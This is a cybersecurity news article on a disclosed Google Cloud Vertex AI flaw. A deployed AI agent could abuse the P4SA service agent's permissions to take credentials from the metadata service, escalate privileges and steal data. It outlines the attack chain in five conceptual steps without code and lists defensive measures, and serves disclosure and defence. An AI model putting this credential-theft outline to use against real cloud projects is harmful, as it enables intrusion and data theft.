Vertex AI Vulnerability Exposed: How "Double Agents" Can Weaponize Google Cloud AI for Data Theft

By Imthiyaz Ali
Vertex AI Vulnerability Exposed: How "Double Agents" Can Weaponize Google Cloud AI for Data Theft

A newly disclosed vulnerability in Google Cloud’s Vertex AI platform has raised serious concerns about the security of AI-driven cloud environments. Researchers from Palo Alto Networks Unit 42 uncovered a flaw in the permission model that could allow attackers to weaponize AI agents, extract sensitive data, and potentially compromise entire cloud projects.

Understanding the Vertex AI Security Flaw

Vertex AI, Google Cloud’s flagship machine learning platform, enables organizations to build, deploy, and scale AI models efficiently. However, the vulnerability lies in how service agents—specifically the Per-Project, Per-Product Service Agent (P4SA)—interact with deployed AI agents in the system.

According to Unit 42, attackers could exploit this interaction by leveraging the default permissions granted to these service agents. Once an AI agent is deployed using Vertex AI’s Agent Engine, it may gain access to sensitive resources beyond its intended scope.

How the Attack Works

The attack chain involves multiple stages, primarily focusing on abusing metadata services and privilege escalation mechanisms:

  1. Deployment Abuse: Attackers deploy a malicious AI agent within a target project.
  2. Metadata Exploitation: The agent accesses the metadata service to retrieve service account credentials.
  3. Credential Extraction: Tokens associated with the P4SA are extracted.
  4. Privilege Escalation: Using these credentials, attackers gain elevated permissions.
  5. Data Exfiltration: Sensitive data and private artifacts are accessed and extracted.

Why This Vulnerability is Critical

The impact of this vulnerability is particularly severe due to the central role Vertex AI plays in enterprise AI workflows. Organizations often store proprietary models, datasets, and business logic within these environments.

  • Over 60% of enterprises now use cloud-based AI services in production environments.
  • AI workloads often include sensitive training data, including customer and operational information.
  • Misconfigured IAM roles are responsible for nearly 45% of cloud security incidents.

By exploiting this flaw, attackers could move laterally across cloud environments, access Google-owned resources in certain contexts, and compromise multiple services within a project.

The Role of P4SA in the Exploit

The Per-Project, Per-Product Service Agent (P4SA) is designed to manage interactions between Google Cloud services and user resources. However, its broad permissions can become a liability when improperly scoped.

In this case, attackers can leverage the P4SA to:

  • Access restricted APIs
  • Interact with storage buckets
  • Retrieve sensitive artifacts
  • Execute actions on behalf of the project

Potential Business Impact

The implications of this vulnerability extend beyond technical risks. Organizations relying on Vertex AI could face:

  • Data breaches involving proprietary AI models
  • Intellectual property theft
  • Regulatory compliance violations (GDPR, HIPAA, etc.)
  • Financial losses due to incident response and downtime

For enterprises with multi-tenant AI environments, the risk becomes even more pronounced, as attackers may pivot across projects and services.

Mitigation and Security Recommendations

To reduce exposure to such vulnerabilities, security teams should adopt the following best practices:

  • Apply the principle of least privilege to service accounts
  • Restrict access to the metadata service
  • Monitor and audit service agent activities
  • Implement network segmentation for AI workloads
  • Use identity-aware proxies and secure authentication mechanisms

Additionally, organizations should continuously review IAM configurations and leverage security tools that provide visibility into cloud permissions and anomalies.

The Bigger Picture: AI Security Risks Are Growing

This discovery highlights a broader trend: as AI platforms become more integrated into cloud ecosystems, their attack surface expands significantly. AI agents, while powerful, can also become entry points for sophisticated attacks if not properly secured.

The convergence of AI and cloud computing demands a new approach to cybersecurity—one that accounts for autonomous agents, dynamic permissions, and complex service interactions.

NeuraCyb's Assessment

The Vertex AI vulnerability serves as a critical reminder that even advanced cloud platforms are not immune to security flaws. By exploiting service agent permissions and metadata access, attackers can gain a foothold in cloud environments and execute high-impact attacks.

As organizations continue to adopt AI at scale, securing these environments must become a top priority. Proactive monitoring, strict IAM controls, and continuous security assessments are essential to safeguarding sensitive data and maintaining trust in cloud-based AI systems.

Reference Links and Sources

Imthiyaz Ali
Imthiyaz Ali
Imtiyaz is an experienced Cybersecurity Professional with over 5 years of experience in Cybersecurity Research.